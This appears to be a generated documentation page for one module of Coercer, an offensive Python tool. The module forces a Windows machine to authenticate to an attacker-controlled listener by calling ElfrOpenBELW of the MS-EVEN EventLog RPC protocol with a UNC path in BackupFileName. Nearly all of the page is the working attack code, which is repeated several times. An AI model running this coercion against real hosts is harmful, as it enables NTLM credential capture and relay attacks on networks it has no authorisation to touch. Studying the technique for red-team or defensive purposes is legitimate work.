coercer.methods.MS_EVEN.ElfrOpenBELW

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : ElfrOpenBELW.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 11 Dec 2022
 6
 7
 8from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 9from coercer.network.DCERPCSessionError import DCERPCSessionError
10from impacket.dcerpc.v5 import even
11from impacket.dcerpc.v5.dtypes import NULL
12
13
14class ElfrOpenBELW(MSPROTOCOLRPCCALL):
15    """
16    Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
17
18    Method found by:
19     - [@evilashz](https://github.com/evilashz/)
20    """
21
22    exploit_paths = [
23        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
24    ]
25
26    access = {
27        "ncan_np": [
28            {
29                "namedpipe": r"\PIPE\eventlog",
30                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
31                "version": "0.0"
32            }
33        ]
34    }
35
36    protocol = {
37        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
38        "shortname": "MS-EVEN"
39    }
40
41    function = {
42        "name": "ElfrOpenBELW",
43        "opnum": 9,
44        "vulnerable_arguments": ["BackupFileName"]
45    }
46
47    def trigger(self, dcerpc_session, target):
48        if dcerpc_session is not None:
49            try:
50                self.path = self.path.rstrip('\x00')
51                request = even.ElfrOpenBELW()
52                request['UNCServerName'] = NULL
53                request['BackupFileName'] = self.path
54                request['MajorVersion'] = 1
55                request['MinorVersion'] = 1
56                resp = dcerpc_session.request(request)
57                resp.dump()
58                return ""
59            except Exception as err:
60                return err
61        else:
62            print("[!] Error: dce is None, you must call connect() first.")
63            return None
class ElfrOpenBELW(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
15class ElfrOpenBELW(MSPROTOCOLRPCCALL):
16    """
17    Coercing a machine to authenticate using function [ElfrOpenBELW](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1) (opnum 9) of [MS-EVEN: EventLog Remoting Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-even/55b13664-f739-4e4e-bd8d-04eeda59d09f)
18
19    Method found by:
20     - [@evilashz](https://github.com/evilashz/)
21    """
22
23    exploit_paths = [
24        ("smb", '\\??\\UNC\\{{listener}}{{smb_listen_port}}\\{{rnd(8)}}\\aa')
25    ]
26
27    access = {
28        "ncan_np": [
29            {
30                "namedpipe": r"\PIPE\eventlog",
31                "uuid": "82273fdc-e32a-18c3-3f78-827929dc23ea",
32                "version": "0.0"
33            }
34        ]
35    }
36
37    protocol = {
38        "longname": "[MS-EVEN]: EventLog Remoting Protocol",
39        "shortname": "MS-EVEN"
40    }
41
42    function = {
43        "name": "ElfrOpenBELW",
44        "opnum": 9,
45        "vulnerable_arguments": ["BackupFileName"]
46    }
47
48    def trigger(self, dcerpc_session, target):
49        if dcerpc_session is not None:
50            try:
51                self.path = self.path.rstrip('\x00')
52                request = even.ElfrOpenBELW()
53                request['UNCServerName'] = NULL
54                request['BackupFileName'] = self.path
55                request['MajorVersion'] = 1
56                request['MinorVersion'] = 1
57                resp = dcerpc_session.request(request)
58                resp.dump()
59                return ""
60            except Exception as err:
61                return err
62        else:
63            print("[!] Error: dce is None, you must call connect() first.")
64            return None

Coercing a machine to authenticate using function ElfrOpenBELW (opnum 9) of MS-EVEN: EventLog Remoting Protocol

Method found by:

def trigger(self, dcerpc_session, target):
48    def trigger(self, dcerpc_session, target):
49        if dcerpc_session is not None:
50            try:
51                self.path = self.path.rstrip('\x00')
52                request = even.ElfrOpenBELW()
53                request['UNCServerName'] = NULL
54                request['BackupFileName'] = self.path
55                request['MajorVersion'] = 1
56                request['MinorVersion'] = 1
57                resp = dcerpc_session.request(request)
58                resp.dump()
59                return ""
60            except Exception as err:
61                return err
62        else:
63            print("[!] Error: dce is None, you must call connect() first.")
64            return None